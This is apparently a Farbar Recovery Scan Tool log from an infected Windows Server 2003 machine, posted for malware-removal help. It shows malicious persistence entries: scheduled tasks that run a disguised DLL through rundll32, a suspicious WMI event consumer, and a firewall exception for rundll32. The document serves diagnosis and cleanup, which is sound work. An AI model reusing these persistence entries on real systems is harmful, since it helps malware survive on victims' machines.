==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-06-01 17:05 - 2017-06-01 17:06 - 00000000 ____D C:\FRST
2017-05-23 04:48 - 2017-05-24 13:48 - 00000414 _____ C:\WINDOWS\Tasks\Mysa2.job
2017-05-22 13:48 - 2017-05-24 13:48 - 00000334 _____ C:\WINDOWS\Tasks\Mysa1.job
2017-05-18 22:05 - 2017-06-01 17:07 - 00000000 ____D C:\Documents and Settings\Administrator.ART\Local Settings\Temp\1
2017-05-18 20:39 - 2017-05-18 20:49 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2017-05-18 17:03 - 2017-05-18 21:41 - 00121560 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2017-05-18 16:58 - 2017-05-18 16:58 - 00000772 _____ C:\Documents and Settings\All Users\Start Menu\Programs\Mozilla Firefox.lnk
2017-05-18 16:58 - 2017-05-18 16:58 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-05-18 16:58 - 2017-05-18 16:58 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-05-18 16:58 - 2017-05-18 16:58 - 00000000 ____D C:\Documents and Settings\Administrator.ART\Application Data\Mozilla
2017-05-18 15:37 - 2017-05-18 15:37 - 00000000 ____D C:\Documents and Settings\All Users\Start Menu\Programs\TightVNC
2017-05-18 15:36 - 2017-05-18 15:37 - 00000000 ____D C:\Program Files\TightVNC
2017-05-18 15:36 - 2017-05-18 15:36 - 00000000 ____D C:\Documents and Settings\All Users\Application Data\TightVNC
2017-05-18 15:34 - 2017-05-18 15:32 - 02191360 _____ C:\Documents and Settings\Administrator\Desktop\tightvnc-2.8.8-gpl-setup-64bit (1).msi
2017-05-18 15:29 - 2017-05-18 17:21 - 19607208 _____ (RealVNC Ltd ) C:\Documents and Settings\Administrator\Desktop\VNC-6.1.0-Windows.exe
2017-05-18 15:29 - 2017-05-18 15:26 - 19576625 _____ C:\Documents and Settings\Administrator\Desktop\VNC-6.1.0-Windows.zip
2017-05-18 15:17 - 2017-05-18 15:17 - 00000000 ____D C:\Documents and Settings\Administrator\Application Data\.clamwin
2017-05-18 14:38 - 2017-05-18 14:38 - 02494560 _____ C:\Documents and Settings\Administrator.ART\Local Settings\Temp\xfB.tmp
2017-05-16 14:37 - 2017-05-16 15:23 - 00000000 ____D C:\Documents and Settings\All Users\Application Data\RogueKiller
2017-05-16 14:37 - 2017-05-16 14:37 - 00028272 _____ C:\WINDOWS\system32\Drivers\TrueSight.sys
2017-05-16 08:31 - 2017-05-16 08:31 - 00000000 ____D C:\Documents and Settings\Administrator.ART\Application Data\Curiolab
2017-05-15 20:45 - 2017-05-15 20:45 - 00000638 _____ C:\Documents and Settings\Administrator.ART\Desktop\Shortcut to mbar.lnk
2017-05-15 20:43 - 2017-05-15 20:43 - 00000000 ____D C:\Documents and Settings\All Users\Application Data\AVAST Software
2017-05-15 20:05 - 2017-05-15 20:05 - 00000678 _____ C:\Documents and Settings\Administrator.ART\Desktop\Shortcut to Tcpview.lnk
2017-05-15 19:58 - 2017-06-01 17:06 - 00000000 ____D C:\Documents and Settings\Administrator.ART\Desktop\tools
2017-05-15 16:49 - 2017-05-15 16:49 - 00000000 ____D C:\Documents and Settings\All Users\Application Data\ESET
2017-05-15 16:02 - 2017-05-18 17:48 - 00000000 ____D C:\AdwCleaner
2017-05-15 15:27 - 2017-05-15 15:27 - 00000000 ____D C:\Documents and Settings\All Users\Application Data\HitmanPro
2017-05-15 15:21 - 2017-06-01 17:07 - 61818538 _____ C:\WINDOWS\ZAM_Guard.krnl.trace
2017-05-15 15:21 - 2017-06-01 17:06 - 58802247 _____ C:\WINDOWS\ZAM.krnl.trace
2017-05-15 15:21 - 2017-05-15 15:21 - 00203680 _____ (Zemana Ltd.) C:\WINDOWS\system32\Drivers\zam64.sys
2017-05-15 15:20 - 2017-05-15 15:20 - 00203680 _____ (Zemana Ltd.) C:\WINDOWS\system32\Drivers\zamguard64.sys
2017-05-15 14:20 - 2017-05-15 14:20 - 00000000 ____D C:\Documents and Settings\All Users\Start Menu\Programs\VMware
2017-05-15 14:19 - 2017-05-15 14:19 - 00000000 ____D C:\Program Files (x86)\VMware
2017-05-15 10:54 - 2015-05-13 18:03 - 00001592 _____ C:\Documents and Settings\Administrator.ART\Desktop\Event Viewer.lnk
2017-05-15 10:46 - 2017-05-15 15:05 - 00000060 _____ C:\WINDOWS\system32\s
2017-05-15 09:58 - 2017-05-15 09:58 - 00000000 ____D C:\Documents and Settings\All Users\Application Data\Norton
2017-05-12 16:36 - 2017-05-12 16:36 - 00000085 _____ C:\WINDOWS\wininit.ini
2017-05-12 16:28 - 2017-05-12 16:35 - 00000000 ____D C:\Documents and Settings\All Users\Application Data\VMware
2017-05-12 14:45 - 2017-05-15 10:46 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2017-05-12 14:45 - 2017-05-12 16:36 - 00000000 ____D C:\Documents and Settings\All Users\Application Data\Spybot - Search & Destroy
2017-05-12 14:45 - 2017-05-12 14:45 - 00065536 _____ C:\WINDOWS\system32\config\SpybotSD.evt
2017-05-12 14:34 - 2017-05-12 14:34 - 00000000 ____D C:\Documents and Settings\All Users\Application Data\Avg
2017-05-11 12:10 - 2017-05-11 12:10 - 00000005 _____ C:\WINDOWS\system32\1.txt
2017-05-10 19:46 - 2017-05-10 19:46 - 00136688 _____ C:\WINDOWS\Minidump\Mini051017-01.dmp
2017-05-10 19:46 - 2017-05-10 19:46 - 00000000 ____D C:\WINDOWS\Minidump
2017-05-02 23:34 - 2017-05-02 23:34 - 00000000 ____D C:\Program Files\Microsoft Updates

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-06-01 17:03 - 2013-11-14 09:59 - 00000240 _____ C:\WINDOWS\system32\config\netlogon.ftl
2017-05-18 22:04 - 2017-02-17 18:26 - 00000000 ____D C:\Documents and Settings\All Users\Application Data\Malwarebytes' Anti-Malware (portable)
2017-05-18 22:04 - 2013-11-13 15:14 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-05-18 22:02 - 2013-11-14 10:02 - 00000178 ___SH C:\Documents and Settings\Administrator.ART\ntuser.ini
2017-05-18 22:02 - 2013-11-13 15:14 - 00032472 _____ C:\WINDOWS\Tasks\SchedLgU.Txt
2017-05-18 21:16 - 2015-05-13 21:29 - 00000000 __HDC C:\WINDOWS\$NtUninstallKB926122$
2017-05-18 17:02 - 2015-05-13 20:16 - 00000000 ____D C:\Documents and Settings\All Users\Application Data\Malwarebytes
2017-05-18 16:24 - 2013-11-13 02:33 - 00000000 ____D C:\Documents and Settings
2017-05-18 16:13 - 2013-11-13 02:33 - 00000000 ____D C:\Documents and Settings\All Users
2017-05-18 16:10 - 2013-11-13 15:15 - 00000178 ___SH C:\Documents and Settings\Administrator\ntuser.ini
2017-05-18 15:57 - 2015-05-13 09:49 - 00000440 __RSH C:\Documents and Settings\Administrator\ntuser.pol
2017-05-18 15:57 - 2013-11-13 15:15 - 00000000 ____D C:\Documents and Settings\Administrator
2017-05-18 14:26 - 2007-02-18 05:00 - 00002206 _____ C:\WINDOWS\system32\wpa.dbl
2017-05-15 21:21 - 2013-11-13 02:21 - 00000000 RSHDC C:\WINDOWS\system32\dllcache
2017-05-15 16:14 - 2014-12-15 20:08 - 00000000 ____D C:\Documents and Settings\Administrator.ART\Application Data\Wireshark
2017-05-15 15:22 - 2013-11-14 16:31 - 00000664 _____ C:\WINDOWS\SysWOW64\d3d9caps.dat
2017-05-15 14:20 - 2013-11-14 10:19 - 00001024 _____ C:\.rnd
2017-05-12 16:41 - 2013-11-13 02:21 - 00000000 ____D C:\WINDOWS\repair
2017-05-10 19:46 - 2013-11-13 02:21 - 934907904 _____ C:\WINDOWS\MEMORY.DMP
2017-05-08 19:37 - 2013-11-13 02:35 - 00357316 _____ C:\WINDOWS\system32\PerfStringBackup.INI

==================== Files in the root of some directories =======

2013-11-19 13:55 - 2015-10-29 14:00 - 0258256 _____ () C:\Program Files\BAFWrapper.log
2015-05-07 15:26 - 2015-05-07 15:26 - 0000218 ____N () C:\Documents and Settings\Administrator.ART\Local Settings\Application Data\recently-used.xbel

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe IS MISSING <==== ATTENTION
C:\WINDOWS\SysWOW64\wininit.exe IS MISSING <==== ATTENTION
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
C:\WINDOWS\system32\codeintegrity\Bootcat.cache IS MISSING <==== ATTENTION


ATTENTION: ==> Could not access BCD.

==================== End of FRST.txt ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 14-05-2017
Ran by Administrator (01-06-2017 17:07:23)
Running from C:\Documents and Settings\Administrator.ART\Desktop\tools
Microsoft Windows Server 2003 Service Pack 2 (X64) (2013-11-13 22:12:29)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-2969604724-871335673-3114479108-500 - Administrator - Enabled) => %SystemDrive%\Documents and Settings\Administrator
Guest (S-1-5-21-2969604724-871335673-3114479108-501 - Limited - Disabled)
SUPPORT_388945a0 (S-1-5-21-2969604724-871335673-3114479108-1001 - Limited - Disabled)
___VMware_Conv_SA___ (S-1-5-21-2969604724-871335673-3114479108-1009 - Limited - Enabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)


==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

CA ARCserve Backup (HKLM-x32\...\CA ARCserve Backup) (Version: 16.0.6838 - CA, Inc.)
CA ARCserve Backup Agent for Open Files for Windows (HKLM\...\{CAABDD41-1935-4C04-AE4B-803EF455E1A3}) (Version: 16.0.6838 - CA, Inc.)
CA ARCserve Backup Client Agent for Windows (Version: 16.0.6838 - CA, Inc.) Hidden
CA ARCserve Backup Setup Support Files (x32 Version: 16.0.6838 - CA, Inc.) Hidden
CA ARCserve Discovery Service (x32 Version: 16.0.6838 - CA, Inc.) Hidden
CA ARCserve Universal Agent (Version: 16.0.6838 - CA, Inc.) Hidden
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Intel® Network Connections 18.3.62.0 (HKLM\...\{FCF3ECF7-7AE0-4E26-B387-09A3A80B79CC}) (Version: 18.3.62.0 - Intel)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.51106 (HKLM-x32\...\{6e8f74e0-43bd-4dce-8477-6ff6828acc07}) (Version: 11.0.51106.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.51106 (HKLM-x32\...\{8e70e4e1-06d7-470b-9f74-a51bef21088e}) (Version: 11.0.51106.1 - Microsoft Corporation)
Mozilla Firefox 52.1.1 ESR (x86 en-US) (HKLM-x32\...\Mozilla Firefox 52.1.1 ESR (x86 en-US)) (Version: 52.1.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 52.1.1 - Mozilla)
Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.5.1 - Notepad++ Team)
TightVNC (HKLM\...\{DEE0B752-52D8-4615-9BEE-1EDA46628960}) (Version: 2.8.8.0 - GlavSoft LLC.)
Update for Windows Internet Explorer 8 (KB3074886) (HKLM\...\KB3074886-IE8) (Version: 1 - Microsoft Corporation)
Update for Windows Internet Explorer 8 (KB982632) (HKLM\...\KB982632-IE8) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB2345886) (HKLM\...\KB2345886) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB2467659) (HKLM\...\KB2467659) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB2748349) (HKLM\...\KB2748349) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB2749655) (HKLM\...\KB2749655) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB2981580) (HKLM\...\KB2981580) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB2993651) (HKLM\...\KB2993651) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB3065979) (HKLM\...\KB3065979) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB936357) (HKLM\...\KB936357) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB948496) (HKLM\...\KB948496) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB955759) (HKLM\...\KB955759) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB968389) (HKLM\...\KB968389) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB971029) (HKLM\...\KB971029) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB973815) (HKLM\...\KB973815) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB973825) (HKLM\...\KB973825) (Version: 1 - Microsoft Corporation)
VC_CRT_x64 (Version: 1.02.0000 - Intel Corporation) Hidden
VMware vCenter Converter Standalone (HKLM-x32\...\{2BCC4907-4205-4338-BDA5-94F183144C35}) (Version: 5.5.3.2183569 - VMware, Inc.)
Windows Internet Explorer 8 (HKLM\...\ie8) (Version: 20090308.140744 - Microsoft Corporation)
WinPcap 4.1.3 (HKLM-x32\...\WinPcapInst) (Version: 4.1.0.2980 - Riverbed Technology, Inc.)
WinRAR 5.21 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)
Wireshark 1.12.2 (64-bit) (HKLM-x32\...\Wireshark) (Version: 1.12.2 - The Wireshark developer community, hxxp://www.wireshark.org)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Mysa1.job => rundll32.exe  c:\windows\debug\item.dat,ServiceMain aaaa rundll32.exe
Task: C:\WINDOWS\Tasks\Mysa2.job => c:\windows\debug\item.dat

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

WMI_ActiveScriptEventConsumer_bleepyoumm2_consumer:

==================== Loaded Modules (Whitelisted) ==============

2014-10-03 18:02 - 2014-10-03 18:02 - 00086744 _____ () C:\Program Files (x86)\VMware\VMware vCenter Converter Standalone\mspack.dll
2014-10-03 18:00 - 2014-10-03 18:00 - 01297624 _____ () C:\Program Files (x86)\VMware\VMware vCenter Converter Standalone\libxml2.dll
2014-10-03 18:00 - 2014-10-03 18:00 - 00542936 _____ () C:\Program Files (x86)\VMware\VMware vCenter Converter Standalone\sqlite3.dll

==================== Alternate Data Streams (Whitelisted) =========

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Iprip => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\wd.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\UploadMgr => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

HKLM\...\batfile\DefaultIcon: %SystemRoot%\System32\shell32.dll,-153 <===== ATTENTION
HKLM\...\cmdfile\DefaultIcon: %SystemRoot%\System32\shell32.dll,-153 <===== ATTENTION

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2007-02-18 05:00 - 2007-02-18 05:00 - 00000734 ____N C:\WINDOWS\system32\Drivers\etc\hosts

127.0.0.1       localhost

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-2052111302-57989841-725345543-500\Control Panel\Desktop\\Wallpaper ->
HKU\S-1-5-21-2969604724-871335673-3114479108-1007\Control Panel\Desktop\\Wallpaper ->
HKU\S-1-5-21-2969604724-871335673-3114479108-500\Control Panel\Desktop\\Wallpaper ->
DNS Servers: 10.10.10.230 - 10.10.10.231
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: ) (ConsentPromptBehaviorUser: ) (EnableLUA: )
mpsdrv => Firewall Service is not running.
MpsSvc => Firewall Service is not running.
bfe => Firewall Service is not running.
Windows Firewall is disabled.

==================== MSCONFIG/TASK MANAGER disabled items ==


==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

DomainProfile\AuthorizedApplications: [C:\WINDOWS\SysWOW64\rundll32.exe] => Enabled:rundll32
DomainProfile\AuthorizedApplications: [C:\Program Files\TightVNC\tvnserver.exe] => Enabled:TightVNC
DomainProfile\AuthorizedApplications: [C:\Program Files\TightVNC\tvnviewer.exe] => Enabled:TightVNC
DomainProfile\AuthorizedApplications: [C:\Program Files (x86)\Mozilla Firefox\firefox.exe] => Enabled:Firefox (C:\Program Files (x86)\Mozilla Firefox)
DomainProfile\GloballyOpenPorts: [9089:TCP] => Enabled:VMware vCenter Converter Standalone - Agent
DomainProfile\GloballyOpenPorts: [139:TCP] => :LocalSubNet:Disabled:@xpsp2res.dll,-22004
DomainProfile\GloballyOpenPorts: [445:TCP] => :LocalSubNet:Disabled:@xpsp2res.dll,-22005
DomainProfile\GloballyOpenPorts: [137:UDP] => :LocalSubNet:Disabled:@xpsp2res.dll,-22001
DomainProfile\GloballyOpenPorts: [138:UDP] => :LocalSubNet:Disabled:@xpsp2res.dll,-22002

==================== Restore Points =========================

ATTENTION: System Restore is disabled
Check "winmgmt" service or repair WMI.


==================== Faulty Device Manager Devices =============

Name: Microsoft PS/2 Mouse
Description: Microsoft PS/2 Mouse
Class Guid: {4D36E96F-E325-11CE-BFC1-08002BE10318}
Manufacturer: Microsoft
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.

Name: Standard 101/102-Key or Microsoft Natural PS/2 Keyboard
Description: Standard 101/102-Key or Microsoft Natural PS/2 Keyboard
Class Guid: {4D36E96B-E325-11CE-BFC1-08002BE10318}
Manufacturer: (Standard keyboards)
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.

Name: SM Bus Controller
Description: SM Bus Controller
Class Guid: {4D36E97E-E325-11CE-BFC1-08002BE10318}
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.


==================== Event log errors: =========================

Application errors:
==================
Error: (06/01/2017 05:07:01 PM) (Source: crypt32) (EventID: 8) (User: )
Description: Failed auto update retrieval of third-party root list sequence number from: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt> with error: The specified server cannot perform the requested operation.

Error: (06/01/2017 05:07:01 PM) (Source: crypt32) (EventID: 11) (User: )
Description: Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.

Error: (06/01/2017 05:07:01 PM) (Source: crypt32) (EventID: 8) (User: )
Description: Failed auto update retrieval of third-party root list sequence number from: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt> with error: The specified server cannot perform the requested operation.

Error: (06/01/2017 05:07:01 PM) (Source: crypt32) (EventID: 11) (User: )
Description: Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.

Error: (06/01/2017 05:06:59 PM) (Source: crypt32) (EventID: 8) (User: )
Description: Failed auto update retrieval of third-party root list sequence number from: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt> with error: The specified server cannot perform the requested operation.

Error: (06/01/2017 05:06:59 PM) (Source: crypt32) (EventID: 11) (User: )
Description: Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.

Error: (06/01/2017 05:06:59 PM) (Source: crypt32) (EventID: 8) (User: )
Description: Failed auto update retrieval of third-party root list sequence number from: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt> with error: The specified server cannot perform the requested operation.

Error: (06/01/2017 05:06:59 PM) (Source: crypt32) (EventID: 11) (User: )
Description: Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.

Error: (06/01/2017 05:06:59 PM) (Source: crypt32) (EventID: 8) (User: )
Description: Failed auto update retrieval of third-party root list sequence number from: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt> with error: The specified server cannot perform the requested operation.

Error: (06/01/2017 05:06:59 PM) (Source: crypt32) (EventID: 11) (User: )
Description: Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.


System errors:
=============
Error: (05/31/2017 10:41:58 PM) (Source: 0) (EventID: 50) (User: )
Description: Event-ID 50

Error: (05/31/2017 07:09:34 PM) (Source: 0) (EventID: 50) (User: )
Description: Event-ID 50

Error: (05/31/2017 04:33:43 PM) (Source: 0) (EventID: 50) (User: )
Description: Event-ID 50

Error: (05/31/2017 03:13:29 PM) (Source: 0) (EventID: 50) (User: )
Description: Event-ID 50

Error: (05/31/2017 02:10:34 PM) (Source: 0) (EventID: 50) (User: )
Description: Event-ID 50

Error: (05/31/2017 01:09:10 PM) (Source: 0) (EventID: 50) (User: )
Description: Event-ID 50

Error: (05/31/2017 11:42:51 AM) (Source: 0) (EventID: 50) (User: )
Description: Event-ID 50

Error: (05/31/2017 10:25:36 AM) (Source: 0) (EventID: 50) (User: )
Description: Event-ID 50

Error: (05/31/2017 09:23:10 AM) (Source: 0) (EventID: 50) (User: )
Description: Event-ID 50

Error: (05/31/2017 08:17:01 AM) (Source: 0) (EventID: 50) (User: )
Description: Event-ID 50


==================== Memory info ===========================

Processor: Intel® Xeon® CPU E5410 @ 2.33GHz
Percentage of memory in use: 82%
Total physical RAM: 4089.64 MB
Available physical RAM: 727.33 MB
Total Virtual: 5866.99 MB
Available Virtual: 3320.32 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:139.73 GB) (Free:88.07 GB) NTFS
Drive g: () (Network) (Total:546.9 GB) (Free:161.34 GB)
Drive h: () (Network) (Total:546.9 GB) (Free:161.34 GB)
Drive j: () (Network) (Total:546.9 GB) (Free:161.34 GB)
Drive l: () (Network) (Total:546.9 GB) (Free:161.34 GB)
Drive o: () (Network) (Total:4095.87 GB) (Free:2237.88 GB)
Drive p: () (Network) (Total:546.9 GB) (Free:161.34 GB)
Drive r: () (Network) (Total:546.9 GB) (Free:161.34 GB)
Drive w: () (Network) (Total:546.9 GB) (Free:161.34 GB)
Drive y: () (Network) (Total:140 GB) (Free:120.39 GB)
Drive z: () (Network) (Total:4095.87 GB) (Free:2237.88 GB)

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows XP) (Size: 139.7 GB) (Disk ID: CAF58B24)
Partition 1: (Active) - (Size=139.7 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================


Edited by jtcote, 02 June 2017 - 10:20 AM.




